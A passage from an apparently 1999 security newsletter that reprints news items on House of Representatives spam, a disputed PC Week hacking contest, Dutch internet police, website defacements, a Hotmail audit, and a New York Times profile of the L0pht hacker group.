addresses. To make it all funnier recipients hit the reply all button, so very fast mail
servers were down:) Wired.
The House of Spam on the Hill
by Declan McCullagh
3:00 a.m. 5.Oct.99.PDT
The spam began typically enough, with a mass email touting quick weight loss pills.
But by last Friday, the trouble that started with a message sent by one Hill staffer to thousands of House of Representatives addresses had
mushroomed, clogging inboxes, drawing angry accusations, and prompting mass email replies by anti-spam advocates that made the problem even
worse.
Read About ISPs and Spam
"IF YOU'RE LOOKING TO LOSE WEIGHT PERMANENTLY AND YOU DON'T HAVE TIME TO SEEE AN EXPERT HERE'S THE PERFECT OPPORTUNITY. MY
FRIEND LOSS 40 LBS. READ THIS! [sic]" wrote Cher Castillo, an aide to Rep. Alcee Hastings (D-FL), in the original message.
But many recipients directed their complaints to all the other recipients when they hit Reply All. This further jammed the already-taxed House mail
servers, creating widespread annoyance, and preventing some House offices from receiving any email at all.
One response that was particularly ill-received came from Steve Maviglio, chief of staff for Rep. Rush Holt (D-NJ), who -- perhaps inadvertently --
replied to everyone, lecturing them on the evils of spam and requesting that they support his boss' anti-spam legislation.
"When I first got it [the spam], I immediately reported it to House Information Resources," he said.
Then Maviglio wrote, "How would you like to receive thousands of these each day??? Our constituents do -- costing them money and invading their
privacy. Stop Spam!!!!"
And then? "I hit Reply All," he said.
Maviglio said that Microsoft Exchange showed only a few dozen recipients.
Ooops.
Some of the recipients -- there are about 20,000 Hill email addresses, though not all were copied -- thought that Maviglio had orchestrated the
original diet pill spam to promote the so-called Can Spam Act that his office is co-sponsoring.
He denies it. "All I know is that my name showed up as the first one in many emails so people thought we did it. We're creative but not that
creative. Besides, it's against House rules," he said.
A sampling of the hundreds of replies he received: "Undeliverable mail." "I hate you." "Take me off your list." "Die."
Some irked Hill staffers who saw their inboxes swell last Friday with "get-me-off-this-list" replies say that a new law isn't the answer.
"People are trying to blame other people to solve problems they caused themselves," said one aide, who asked not to be identified. "They should be
disciplined."
Some Congressmen joined the fray, writing that Castillo had violated House rules, and other recipients warned that the diet pills suggested in the
original message should not be used to lose weight.
Ironically, if the Can Spam Act had become law -- currently no hearings are scheduled -- Maviglio could be liable for a US$25,000 fine, or "the
actual monetary loss suffered by the provider as a result of the violation," whichever is larger.
And what about Cher Castillo, the original spammer? Her office refused to comment and she did not respond to interview requests.
One staffer who complained to Hasting's office last week about Castillo said at first they didn't take the spam seriously. "But by today they weren't
laughing," the staffer said.
@HWA
37.0 NET-SECURITY SITE INFO
~~~~~~~~~~~~~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by BHZ, Tuesday 5th October 1999 on 1:01 pm CET
Since yesterday we on net-sec host two security sites. InterScape Security
(http://interscape.net-security.org) and 403 forbiden (http://forbidden.net-security.org).
Do check the both of them. Also Packet Storm Security mirrors Default newsletter on
http://packetstorm.securify.com/mag/default
@HWA
38.0 PCWEEKS' HACKER CHALLENGE "RIGGED" FOR NT
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by Thejian, Tuesday 5th October 1999 on 5:30 am CET
There has been quite a lot of discussion on the usefullness of so-called
"hack-the-box" contests. Well, ZDNet shows us how not to do it. Today, ZDNet Labs
revealed that they deliberately neglected to apply some 21 different recent security
patches to the Linux system which participated in the PCWeek hacker challenge,
including one used by the cracker to gain access to the Linux server. ZDNet's
response to the charges of the unfairness of omitting the 21 security patches was
that enterprise businesses would not want to apply 21 individual fixes and that most
large companies would prefer the one large, sweeping-in-scope, fix. This objection
didn't prevent ZDNet Labs from hypocritically applying Microsoft's latest huge service
release for Windows NT in time for the test though. Linux Today
http://linuxtoday.com/stories/10767.html
ZDNet Admits Mistakes in Recent Security Test
Oct 4, 1999, 23:19 UTC (89 Talkbacks) (Other stories by Arne W. Flones)
[ The opinions expressed by authors on Linux Today are their own. They speak only for themselves
and not for Linux Today. ]
By Arne W. Flones
Regarding the recent Hacker Shootout, ZDNet Labs today admitted that they deliberately ignored an
embarrassing 21 security upgrades to one of the two systems under test. (See PC Week: CGI script opens
door)
In this alleged test of security, ZDNet Labs invited "hackers" [sic] to try to break into two different
computers, one running Windows NT and one running the Red Hat distribution of Linux. This came on the
heals of August's similar battle between Windows NT and an Apple-based Linux distribution which drew a
lot of publicity. Under criticism from the Linux community for the lack of objectivity in the test, ZDNet's
director, John Taschek responded,
[The test] was designed and put together by PC Week for the purpose of testing security
implementation. We don't care which operating system (if any) is broken into first. We want
to establish the basis for a story on the best practices for implementing security.
And later he said,
We don't care who wins or loses--in fact we're not looking to report a winner or loser. Just
on implementations.
In spite of continued protests, the test proceeded and on September 24 the Linux site was cracked using a
combination of a weakness in Web programming and a security hole in a program called crond, part of
every Linux installation.
When the method used by the cracker was revealed, it was immediately apparent that both of the security
holes could have easily been closed. The first hole, within a type of World Wide Web program called a
CGI script, could have been avoided by paying closer attention to security when writing the script. This
hole had nothing to do with Linux, but was in a separate application. The second hole had been publicly
revealed in August by Red Hat, the distributor of the Linux system under test. Although ZDNet labs might
have inadvertently slipped up on the first hole, they would have certainly known about the second. The
cracker used both holes to crack into the system.
Today, ZDNet Labs revealed that they deliberately neglected to apply some 21 different recent security
patches to the Linux system, including one used by the cracker to gain access to the Linux server. It is this
admission that has raised the hackles of knowledgeable computer users, security experts and the Linux
community.
As the source instructions which make up Linux are freely available to anybody who wants them, there are
no reasons to wait to make security changes available to the public. So this number of security patches are
common in the Linux world. As soon as a security hole is found, it is quickly patched and the fix is
immediately posted to the public forums on the Net. The ability to look at all the source instructions enables
anybody to verify the correctness of the patch. Typically, a program to exercise the exploitation is available
as well. This dramatically reduces the risk in applying these patches. The scope of the changes is very
narrow and is very easily tested in isolation. Therefore, with a small effort, and in a very short time, an IT
manager can know the impact the patch will have on her all important systems. The result is that the patch
can be applied quickly and with the assurance that nothing will break but the cracker's ability to
compromise the company's data.
This is very unlike the Windows NT world, where Microsoft keeps all the source instructions secret.
Microsoft Windows, by nature of its proprietary design, must withhold security information and release the
fixes all at once in a larger, less frequent, service release. The policy of security through obscurity is
arguable. But the impact of fixing security holes with an infrequent and all encompassing software upgrade
is not. It can make testing a nightmare because individual fixes are not testable in exclusion of other
changes. And, since Microsoft lumps the many security fixes with other, general improvements, adding a
Microsoft service release enterprise-wide is a very, very risky affair. One never knows what will break.
Therefore, the rules of the game are very different for Windows than they are for Linux. ZDNet Labs
conveniently ignores this fact.
ZDNet's response to the charges of the unfairness of omitting the 21 security patches was that enterprise
businesses would not want to apply 21 individual fixes and that most large companies would prefer the one
large, sweeping-in-scope, fix. ZDNet provides no basis for this absurd claim. Their claim goes against
common practice in the industry and it is against common sense. It is only in the Microsoft world where an
untestable, monolithic software release is preferable to a few much smaller, and manageable, perturbances.
Nota bene: ZDNet's objection to the the 21 easily audited and tiny patches didn't prevent ZDNet Labs from
hypocritically applying Microsoft's latest huge service release for Windows NT in time for the test.
ZDNet's claims are unsupportable. Not only was ZDNet Labs responsible for allowing the installation of a
flubbed CGI script which allowed the cracker to peek into the Linux system, they were negligent in
ignoring 21 known security holes. Their admission today that they deliberately chose not to apply these
patches has tainted their test. They knew that every cracker would look first at these 21 cricks in Linux's
armor. No wonder it only took a few days for the Linux system to be cracked. ZDNet's incompetence
assured it.
This comes as close to professional malfeasance as I have ever seen. With today's knowledge it is
impossible for ZDNet to claim even vestigial objectivity. With what we now know of this affair, to continue
the charade would be an injustice.
@HWA
39.0 DUTCH "CYBERCOPS" PATROLLING THE NET
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by Thejian, Tuesday 5th October 1999 on 5:00 am CET
Dutch police opened their fight against Internet crime Monday by naming 15
"cybercops" to target on-line offenses ranging from pedophilia to credit-card fraud. The
team will patrol the country's Internet sites in search of on-line crime, using new
computer surveillance equipment and old-fashioned police techniques. The Internet
officers will be able to tap phone lines and, with a court order, will be allowed to crack
into computer systems to find incriminating evidence - the virtual equivalent of a
search warrant. Read more
http://www.techserver.com/noframes/story/0,2294,500041373-500067208-500122112-0,00.html
Dutch 'cybercops' to patrol information highway
Copyright © 1999 Nando Media
Copyright © 1999 Associated Press
From Time to Time: Nando's in-depth look at the 20th century
AMSTERDAM, Netherlands (October 4, 1999 3:46 p.m. EDT http://www.nandotimes.com) - Dutch police
opened their fight against Internet crime Monday by naming 15 "cybercops" to target on-line offenses
ranging from pedophilia to credit-card fraud.
The team will patrol the country's Internet sites in search of on-line crime, using new computer
surveillance equipment and old-fashioned police techniques.
"They will go after all crime committed on the Internet and that could range from child pornography
to credit card fraud, or the sale of illegal medicine and software," police spokesman Albert Folgerts
said.
The Internet officers will be able to tap phone lines and, with a court order, will be allowed to
crack into computer systems to find incriminating evidence - the virtual equivalent of a search
warrant.
@HWA
40.0 BIKE WEB SITE HACKS ITSELF
~~~~~~~~~~~~~~~~~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by Thejian, Tuesday 5th October 1999 on 4:10 am CET
Hack back. That's what Hoffman Bikes decided to do after its Web site was defaced
for the fourth time by the same hacker group in the past two weeks. "Good riders,
bad nerds," the group called "r 1 3 9" wrote, mockingly. Marketing director Bryan
Baxter finally responded by posting text and images that spoofed the company's
image and security at its regular address, www.hoffmanbikes.com himself. Lol!
http://cnn.com/TECH/computing/9910/04/hacker.week/index.html
Bike Web site hacks itself after
four attacks
By Robin Lloyd
CNN Interactive Senior Writer
October 4, 1999
Web posted at: 4:47 p.m. EDT (2047 GMT)
In this story:
'Learning as we go'
Smaller businesses at lower risk
Web site tallies hacks
No contact with hackers
(CNN) -- Hack back. That's what Hoffman Bikes decided to do after its Web
site was defaced for the fourth time by the same hacker group in the past two
weeks.
"Good riders, bad nerds," the group called "r 1 3 9" wrote, mockingly.
Marketing director Bryan Baxter finally responded by posting text and images
that spoofed the company's image and security at its regular address,
www.hoffmanbikes.com.
"If they wanted to make us look stupid, we decided to help them out," he said.
The site for the Oklahoma-based bike manufacturer was just one of some two
dozen to be defaced for hackers in the past 10 days, according to attrition.org,
a site that logs and mirrors Web defacements.
But it was the only one to respond with humor.
"We decided that if they were gonna get in that we would help them out,"
Baxter said. He crafted the site as an online catalog, not for e-commerce, so
security was not a priority.
"It's become a little soap opera," he said. "We just decided not to be too uptight
about it. They could've done stuff that was a lot worse. They could've put
porn up on it or something."
Baxter put up the counter-hack himself, featuring a less-than-flattering picture
of Matt Gipson, one of Hoffman's sponsored riders, with a pointer from his
head to the words "duh, huh?"
The counter-site also offered links to Hoffman's real site and the previous
hacks to the site, as well as to lists for site visitors in case they wanted to join r
1 3 9 or get work at Hoffman or give it Internet security advice.
That drew about 100 responses and dozens of phone calls.
'Learning as we go'
Baxter admitted that the rider-owned company is not "super good" yet at
operating its Web site. "We're learning as we go," he said.
Hoffman pays for its server time in kind from a friend in Texas. "We tried to
change some things," after the first hack, he said. "We tried four times with
different server settings and they were still getting in." So he gave up, in
effect.
If the site's security is breached again, Hoffman will just take its site down
before trying again, he said.
Patrice Rapalus, director of Computer Security Institute in San Francisco, said
beefed up security, patching holes and reports to the authorities are
recommended responses to hackers, not humor.
Defacement, the equivalent of graffiti on a bricks and mortar business, is the
least of a firm's computer security concerns, she said.
That kind of hack is impossible to hide from consumers. Many companies
prefer to cover up the more serious hack -- intrusions into computer networks,
she said.
Companies hate to admit one likely scenario -- they are unaware that their
security has been breached, Rapalus said.
The number of companies reporting security breaches in the past three years
rose from 17 percent to 32 percent, she said.
And that's just the companies willing to own up to intrusions of which they are
aware.
Security breaches, even Web site defacements, mar a firm's image and can
damage its electronic business.
"It would undermine any kind of trust someone would have in your
organization and the ability of your organization to safeguard confidential
information or credit card information," she said.
Brian Martin, of attrition.org, said that Hoffman's response to being hacked
multiply was humorous but irresponsible.
"It undermines the idea of secure Web sites and gives their customers the
impression that the (site) administrator simply does not care about security that
much," Martin said.
Smaller businesses at lower risk
Sites for government agencies and banks are far more attractive to hackers
with criminal intent, Rapalus said.
"Like anything else, it's follow the money," she said. CSI, a membership
association, is comprised mainly of Fortune 500 firms and government
agencies.
A list of sites hacked in the past 10 days, as reported by attrition.org, also
illustrates that point.
They included DeltaNet, PanAmSat, a Le Monde publicity site, Altamira
International Bank, Mount Gay Rum site, DC ArtBeat, Seoul National
University, Web Yes Singapore and a State of Utah learning resources site.
Smaller businesses, like larger ones, need to worry about online security as
they launch Internet sites, Rapalus said, but they generally are not the focus of
the most malicious hackers.
She recommended a cooperative effort between law enforcement and
industry to crack down on the big offenders.
Web site tallies hacks
Attrition.org has collected statistics on targets of hacking since it went online
in 1995. By its count, there have been 79 hacks to general government
systems, 27 to NASA, 19 to Army systems, 47 to other military systems, 103
to educational institutions and 1,042 to commercial systems.
Groups called Antichrist and Forpaxe lead the pack, with 148 and 140 hacks
credited to them by attrition.org.
Global Hell, at least one of whose members recently was been arrested as a
result of FBI raids, gets credited with 118 hacks. More than 40 other groups
are credited with anywhere from two to 50 hacks.
Some hackers evidently see a credit on attrition.org as a badge of honor, with
a group called TREATY's hack against IDG Co. claiming in the text of its
defacement that it was "just doing it" to get mentioned on attrition.org.
No contact with hackers
Unlike many hacks, the r 1 3 9 defacements posted no e-mail contact for the
group. Hackers are notorious for signing their work and offering a valid, but
anonymous, mailbox.
But Baxter, of Hoffman Bikes, said he suspected some of the e-mail the
company received in response to its counter-hack were from r 1 3 9 members.
Those correspondents said they would trade security advice for Matt Gipson
autographs, the Hoffman sponsored rider.
"We offered it to them, but we haven't gotten a response back yet," he said.
Hoffman has decided against pressing charges or other legal action against the
hackers even if they did come forward, Baxter said.
"It appears we've turned it into a good thing, at least something entertaining.
But it can be a very, very bad thing. I wish it wasn't possible to do."
@HWA
41.0 ARMY STUDYING IT RECRUITMENT
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by Thejian, Tuesday 5th October 1999 on 3:50 am CET
The Army has kicked off a yearlong study to help determine how to better recruit and
maintain its information technology work force, with an emphasis on how the service
can use financial inducements to attract workers. The charter of the Army Information
Technology/Information Assurance Workforce Issues Study placed compensation first
in the list of issues and challenges the Army must address to attract and retain IT
personnel in a technology-driven economy. The study also will look at non-monetary
inducements. Read more
http://www.fcw.com/pubs/fcw/1999/1004/web-itsurvey-10-04-99.html
OCTOBER 4, 1999 . . . 14:56 EDT
Army studying IT recruitment
BY BOB BREWIN (antenna@fcw.com)
The Army has kicked off a yearlong study to help determine how to better
recruit and maintain its information technology work force, with an emphasis on
how the service can use financial inducements to attract workers.
The charter of the Army Information Technology/Information Assurance
Workforce Issues Study placed compensation first in the list of issues and
challenges the Army must address to attract and retain IT personnel in a
technology-driven economy. The study also will look at non-monetary
inducements.
Lt. Gen. Larry Ellis, Army deputy chief of staff for operations and plans, said
the study will help the Army produce policy and resource recommendations to
enhance IT recruitment, retention, education and training.
In addition, the Army will use the study to develop a table of organization for its
Force XXI digitized battleforce by next August.
Gen. John Keane, Army vice chief of staff, described IT and information
systems as the "dominant" issues the Army needs to keep in mind as it develops
and fields the digitized battle force. The soldiers and civilian Army employees
who operate those Force XXI systems "will always remain the linchpin to
ensure success in information dominance and to counter the continued threats
and security issues for our information networks,'' Keane said in a Sept. 22
memo.
Keane asked the help of all Army IT professionals in developing these new IT
personnel policies and procedures by filling out an online survey
(www.itiasurvey.army.pentagon.mil) no later than Nov. 20.
@HWA
42.0 TRUSTE OK'S HOTMAIL FIXES
~~~~~~~~~~~~~~~~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by Thejian, Tuesday 5th October 1999 on 3:30 am CET
Microsoft has fixed a security hole that threatened the privacy of its 40 million Hotmail
users in August, according to the results of an outside audit released today.
Microsoft in August voluntarily agreed to the audit at the request of the Web privacy
seal program Truste. Until today, however, there had been doubts about whether any
results of the audit would be made public. News.com
http://news.cnet.com/news/0-1005-200-807131.html?tag=st.ne.1002.tgif?st.ne.fd.gif.e
Truste OKs Hotmail security fixes
By Courtney Macavinta
Staff Writer, CNET News.com
October 4, 1999, 4:40 p.m. PT
Microsoft has fixed a security hole that threatened the privacy of its 40 million Hotmail users in August, according to
the results of an outside audit released today.
The announcement disclosed only that a "Big Five" accounting firm reviewed the "nature, extent, and cause of the problem," as
well as the solutions that Microsoft put in place. As part of the audit, Microsoft employees who fixed the hole were interviewed,
and the unnamed firm tested the solution to make sure the problem wouldn't reoccur.
As previously reported, the review of Hotmail was commissioned after the service was pulled offline for two hours when it was
discovered that accounts could be accessed without passwords as long as a user's name--which is commonly found in a Hotmail
address--was known.
Microsoft said it fixed the problem the same day and has since admitted that the hole was the result of a string of code that
hadn't been tested for security.
Microsoft in August voluntarily agreed to the audit at the request of the Web privacy seal program
Truste, which Microsoft generously sponsors. Until today, however, there had been doubts about
whether any results of the audit would be made public.
"Both Microsoft and Truste have confirmed that we've effectively resolved that incident, and that we
are in compliance with Truste's licensing agreement," Richard Purcell, data practices director at
Microsoft, said today.
"The firm had technical experts, and they were careful about reviewing the solutions we put in place
at the code level," he added.
Truste monitors participating sites' privacy practices and ensures that licensees "help protect the
security" of the information they collect and store.
Watchdogs skeptical
Based on guidelines set by the American Institute of Certified Public Accountants (AICPA), which oversees the conduct of major
firms, Microsoft and others participating in the audit were restricted from releasing the accounting firm's full report.
But consumer advocacy group Junkbusters had called for full disclosure of the report, insisting that if the results weren't made
public, Hotmail users would have no assurance that their accounts are safeguarded.
Despite the announcement that Hotmail is secure, Jason Catlett, founder of Junkbusters, was not satisfied with the level of detail
in the companies' announcement.
"All Microsoft and Truste are saying is that someone went in with a notebook and pen and asked questions, but the company is
not revealing the name of the auditor or the instructions to the auditor--the summary is vague," Catlett said. "They had the chance
to commission an audit that could have been open."
Specifically, Microsoft had commissioned an "Agreed-Upon Procedures Engagement," in which the parameters of the review are
set by the certified public account, the client, and usually a specified third party, in this case Truste. The results of this type of
report can only be made available to those parties, according to the AICPA.
The online industry and the Clinton administration have endorsed so-called privacy seal programs as a way to safeguard
anonymity. But as more Net users provide valuable personal information in exchange for goods and custom Web content, privacy
advocates say better laws are needed to shield privacy, because industry guidelines don't come with strong enough enforcement.
Truste says its voluntary efforts are effective.
"From our point of view this does demonstrate that the resolution process we have in place works," said Bob Lewin, executive
director of Truste.
But for Microsoft, the review only puts to rest concern over the August 20 Hotmail security hole. The company has since been
investigating programs that people could use to generate false passwords to crack open Hotmail accounts.
"We can't prevent malicious hackers from targeting these platforms," Purcell added. "But it's important to say that we really have
a strong sense of responsibility about protecting the security of customers' information."
@HWA
43.0 SECURE DSL TECHNOLOGY
~~~~~~~~~~~~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by Thejian, Monday 4th October 1999 on 1:20 am CET
Nortel Networks has taken the wraps off a network-based secure digital subscriber
line (DSL) technology. The idea behind the technology, known as Secure DSL, is that
it stops any electronic incursions or eavesdropping on the "always-on" DSL
connections that many businesses and serious home users of the Internet are now
starting to use. The system works by securing each DSL line with network-based,
packet firewalls, so precluding outside attacks. Full story
http://www.currents.net/newstoday/99/10/03/news5.html
Daily News
Secure DSL Technology
By Sylvia Dennis, Newsbytes.
October 03, 1999
Nortel Networks [NYSE:NT] has taken the wraps off a
network-based secure digital subscriber line (DSL)
technology.
The idea behind the technology, known as Secure DSL, is that
it stops any electronic incursions or eavesdropping on the
"always-on" DSL connections that many businesses and
serious home users of the Internet are now starting to use.
The system works by securing each DSL line with
network-based, packet firewalls, so precluding outside attacks.
Nortel says that Secure DSL is one element of a suite of new
capabilities announced today by Nortel Networks to enable
mass market DSL and will be offered as a new feature on the
Shasta Subscriber Service System (SSS).
The SSS consists of a Shasta 5000 Broadband Service Node
(BSN) with the IP (Internet Protocol) Service Operating
System (iSOS) and Service Creation System (SCS). The BSN
was developed by Shasta Networks, a company that Nortel
acquired in March.
Nortel says that the Shasta 5000 is currently deployed with
several service providers around the world which are
preparing for the transition to mass market deployment of
DSL and other broadband access technologies.
Initially, ten DSL service providers are offering the Secure
DSL service to their subscribers: Cayman Systems,
CopperCom, Efficient Networks, FlowPoint, Jetstream
Communications, Netopia, Network TeleSystems, Promatory
Communications, TollBridge Technologies, and Wind River
Systems.
Anthony Alles, Nortel's general manager, said that, because
DSL lines are typically always connected to the Internet,
unlike the intermittent, dynamic connections of dialup
networks, computers attached to DSL lines are exposed to
Internet security attacks.
As DSL becomes more widely deployed, he said, increasing
numbers of DSL subscribers have reported attacks on their
computers, sometimes leading to copying or destruction of
sensitive data.
"It's critically important for the rapid adoption of DSL that the
DSL industry find an easy, cost-effective solution for securing
always-on DSL lines," he said.
Alles said that DSL is a mass market technology, and will be
widely deployed to residential and small business customers,
most of whom lack the technical skills and resources to deploy
and maintain their own security systems.
"Security is an expectation, not a feature, for the mass market,
and DSL service providers which do not provide such integral
security capabilities may find themselves at a severe
competitive disadvantage," he said.
Pricing on the Shasta 5000 BSN starts at $30,000 for ISPs and
other interested carriers.
Further details of the technology can be found on the Web at
http://www.nortelnetworks.com/shasta .
@HWA
44.0 HACK, COUNTERHACK
~~~~~~~~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by Thejian, Monday 4th October 1999 on 12:40 am CET
Here's another article on those "eight computer hackers in a dingy warehouse" called
the L0pht. A bit of history and methodology of the group a long with some interviewing
quite a good read. Read it
http://www.nytimes.com/library/magazine/home/19991003mag-hackers.html
HacK, CouNterHaCk
The members of L0pht can knock you off line, steal your
credit-card numbers and cut off the power for your whole
neighborhood. But they'd like you to think they're the good
guys. By BRUCE GOTTLIEB Photographs by DANA SMITH
Would you like to see how to
knock someone off the
Web?" Silicosis asks.
Sili, as he is known, is a slim young
man with serious eyes set deeply into
a delicate face. He's the newest
member of a hacker collective known
as L0pht (pronounced "loft"). He
becomes visibly uncomfortable when
asked to talk about himself. He gives
his age as "mid-20's" and then clams
up. But when the conversation moves
to hacking, Sili turns voluble: "I think
it's a thrill to look at a program and
figure out how to make that program
do something that it was never
designed to do in the first place.
There's the challenge."
We sit down at a computer monitor
while Sili explains his latest discovery.
By mimicking messages that typically
flow between computers on a
network, he can reach out to almost
anyone running Windows 95, 98 or
2000 in a large corporate
environment, or anyone using a cable
modem, and forcibly disconnect them
from the Web. In a demonstration of
this, he types a one-line command on
his computer and hits the return key
with a flourish. Sure enough, the
computer across the room, which
seconds before had been connected
to M.I.T.'s server, is now off line. The
same technique, Sili explains, can be
used to take information flowing
between the Web and your neighbor's
computer and reroute it into your
own. A clever hacker could capture a
neighbor's banking transactions,
passwords or credit-card information.
Sili published his research on L0pht's
Web site in mid-August. The report
was covered in the computer publication Infoworld and the on-line
magazine ZDNet. At the time, a Microsoft spokesman, instead of
denouncing L0pht, expressed the hope to reporters that the group would
"design a more secure version of the protocol" -- a hackerproof set of
operating instructions for the computer.
This request strikes Sili as especially outrageous. "Why doesn't Ralph
Nader just redesign the Corvair?" he asks.
Nader is something of a role model at L0pht, a confederation of
eight young hackers who position themselves, incredibly enough,
as a consumer-advocacy group. But L0pht's tactics are a bit unorthodox:
breaking into software systems and then posting instructions on how to
do so on the Web, where they can be picked up by software designers
and malicious hackers alike. Intrigued, I paid a visit to their workshop.
L0pht's "laboratory" is the second floor of a ramshackle warehouse in
suburban Boston. Predictably, the door to the lab has a sign for the pizza
man -- "Domino's Knock Loudly."
The eight men who make up L0pht allow themselves to be identified only
by their screen names: Dr. Mudge, Space Rogue, Dildog, Brian Oblivion,
Kingpin, Silicosis, Weld Pond and John Tan. They look to be in their
20's or 30's, but their six-room suite is an adolescent geek's fantasy
clubhouse. One wall is papered with antiquated circuit boards while
another has a signed picture from Julie, Penthouse Pet. Junk food in the
cupboard is taken seriously. There are three different kinds of Cheez-Its:
hot and spicy, plain and white cheddar.
The warehouse brims with more than 200 computers ranging from
state-of-the-art Sun and Digital workstations to nostalgia pieces like
Commodore 64's and Apple IIe's. Black cables, yellow cables and
jumbles of thin rainbow-colored wires drip from the ceiling, all jacked in
to steel racks of oscilloscopes, radio transmitters, D.S.L. modems,
I.S.D.N. modems, half-opened C.P.U.'s and a 50-foot roof antenna.
The warehouse also contains several small-scale dummy computer
networks.
L0pht's "research" consists of trying to break into these internal systems.
Upon discovering a security flaw in commercial-network software, the
L0phties publish an advisory on their Web site. The advisory is a
double-edged sword: a detailed description of the flaw enough
information for other hackers to duplicate the "exploit" and a solution
that tells network administrators how to close the loophole.
L0pht's unorthodox methods have garnered praise from very unlikely
quarters. Sixteen months ago, L0pht appeared before the Committee on
Governmental Affairs of the United States Senate. Senator Fred
Thompson introduced L0pht not as a "gang" nor even a "group," but,
translating for Washington pols, as a "hacker think tank."
L0pht wowed the committee by reeling off an alarming list of security
holes in public and private systems. After the presentation, Senator
Lieberman gushed, "It is probably not what you came to hear, but
actually, I think you are performing an act of very good citizenship and I
appreciate it." Lieberman went on to compare L0pht, in a single
sentence, to both Rachel Carson and Paul Revere. "You are performing
a valuable service to your country," Thompson added, "and we
appreciate that and want you to continue."
The National Security Council is equally bullish on L0pht. I met the
N.S.C.'s director of information protection, Jeffrey Hunker, at Defcon,
an annual three-day "conference" attracting more than 2,000 computer
hackers from around the country. Hunker had come to talk about
President Clinton's initiatives on computer security (and to spy on
hackers, if you believe the whispers). He surprised me by raving about
the group's technical sophistication. "L0pht has carved out an interest-ing
niche for itself," he added, "and for similar-minded people
white-hatted hackers. Their objective is basically to help improve the
state of the art in security and to be a gadfly, so to speak to identify
products that have vulnerabilities and make certain those vulnerabilities
get fixed."
When I told L0pht about Hunker's comments, they rolled their eyes,
saying, "You're not going to publish that, are you?"
For one thing, they had no wish to be identified as favorites of the
N.S.C., since that might jeopardize their standing among so-called
black-hat, or malicious, hackers. "We are all extremely ethical and
moral," one member allowed, "but we're not white-hat hackers. We have
our own moral and ethical standards" the term is gray-hat.
It's not hard to spot the reasons
for the moral ambiguity. In their
off hours, Mudge and Dildog
are members of Cult of the
Dead Cow, a black-hat hacker
group that recently released
Back Orifice 2000 (bo2k), a
computer program that enables
a hacker to control another
computer from afar. (The name
is a crude play on Microsoft's
Back Office Server, a program
that allows a legitimate
administrator to, among other
things, control another
computer on a network.) But unlike Back Office, bo2k is "invisible,"
meaning that a hacker can spy on another user, even change files, without
the user's knowledge. Dildog, one of bo2k's authors, euphemistically
describes it as "a shy program." Jason Garms, the former head of
Microsoft's security-response team, is a bit more direct, labeling b02k "a
malicious program, with malicious intent."
Perhaps because of their ties to the black-hat community, L0pht
members refuse to be identified, although they will let themselves be
photographed. As Space Rogue explains (and any hacker knows),
pictures are next to useless if you're trying to dig up private data on
someone.
When L0pht testified before the Senate, members would not accept
checks for hotel and travel expenses. As with members of the Witness
Protection Program who have come before the Senate, they were
reimbursed with cash. Senator John Glenn even signed pictures with
the group's screen names: "To Dr. Mudge. . . . To Space Rogue. . . . To
Weld Pond."
Open up the raincoat to expose all the little parts," is how Mudge,
smiling, describes L0pht's ethos. Mudge will not disclose his
age, but mid-30's seems a good guess. He claims a college degree in
music with further course work in computer science. Mudge says that
early experimenting with computers led to informal warnings from certain
"three-letter agencies." He wears his hair below his shoulders, sports a
goatee and favors faded jeans and a T-shirt. In his Senate testimony he
claimed to have given training seminars at NASA and the National
Security Agency.
Mudge frankly admits that he'll answer anyone's technical questions
about hacking. "If a black hat approaches us and says, Hey, this is the
project or problem I'm looking at . . . we'll talk to them, no problem.
And if a government agency approaches us and says, How do you do
this, or, How does this work, we'll talk to them."
Of course, this laissez-faire attitude has its costs. Mudge says: "Full
disclosure is something we had to grapple with for a long time. The flip
side is that critics say, 'You're giving people tools that can actually do
bad things.' That is absolutely true. It's got a lot of nasty side effects."
For instance: last December, a hacker magazine called Phrack disclosed
a flaw in a network program called Cold Fusion. (Network programs
help manage computers that are linked together). In April of this year,
Weld Pond an older, thoughtful L0pht programmer discovered a
second, more serious way to exploit the flaw.
Weld immediately published an advisory on L0pht.com prescribing a fix.
Weld's report also contained enough detail to explain the flaw to
so-called "script kiddies" young, malicious hackers with limited
technical expertise who are among the most avid readers of L0pht's
advisories. In the span of three weeks, according to PC Week, hackers
inserted bogus text and images on at least 100 Cold Fusion systems,
including those of NASA, the Army and the National Oceanic and
Atmospheric Administration.
So why didn't L0pht contact Allaire, the small Cambridge, Mass.,
software firm that makes Cold Fusion, before releasing an advisory? The
reason, say Weld and the other L0phties, is that vendors usually sweep
tips from hackers under the rug. Vendors, claims L0pht, don't want
customers to think software has flaws. "We were trained by the vendors
to go public," says Mudge, "to give them a black eye."
With an attitude like this, it's tempting to blame Weld Pond, especially
since L0pht's advisory led to more security breaches than would have
occurred had nothing ever been reported. It's not enough to claim, as
Weld does, that "We try to stay somewhat neutral we're not on the
vendor's side, we're not on the hacker's side. When we release the tools,
they can be used for good or bad. It's up to the individuals to have
morals."
Mudge is currently writing a paper on a longtime hobbyhorse of his:
the vulnerability of electrical power grids to hacker attacks.
While the computers that control these power grids are not directly
connected to the Internet, Mudge thinks a hacker could still turn out the
nation's lights because utility companies have left the keys to their
computers under the proverbial doormat.
Mudge tells me that careless utility employees often put internal
documents on public servers perhaps to access them from home or
while on the road. Sometimes, Mudge claims, the documents explain
how to access the central computers. Central computers "might have no
attachment to the Internet," he says, "other than the fact that somebody
put up a document on the Internet describing how to get to it and how to
use it." Mudge pauses. "Well, that's just as good."
Mudge has written a program to scan utility companies' Web sites for
words like "confidential" or "password." "I'm not breaking any laws by
doing this, I'm just grabbing public stuff," he is quick to point out. "They
don't realize that they're putting it up there for the world to see."
He shows me a file downloaded from a large utility company that
contains a presentation on company security. Next he opens a file full of
phone numbers from another utility company. "It sounds almost
science-fictionist," he cautions, "but with these numbers here I'd be able
to turn off their entire grid." The phone numbers, he explains, connect to
modems linked to the central switches that determine where electricity
flows. "If I don't publish this information," Mudge claims, "someone else
will come along and do the same thing, with less ethical goals. Now you
can see a situation where people are dying because of these
corporations' stupidity. At that point, who's to blame?"
Given the stakes, Mudge intends to relax his commitment to so-called full
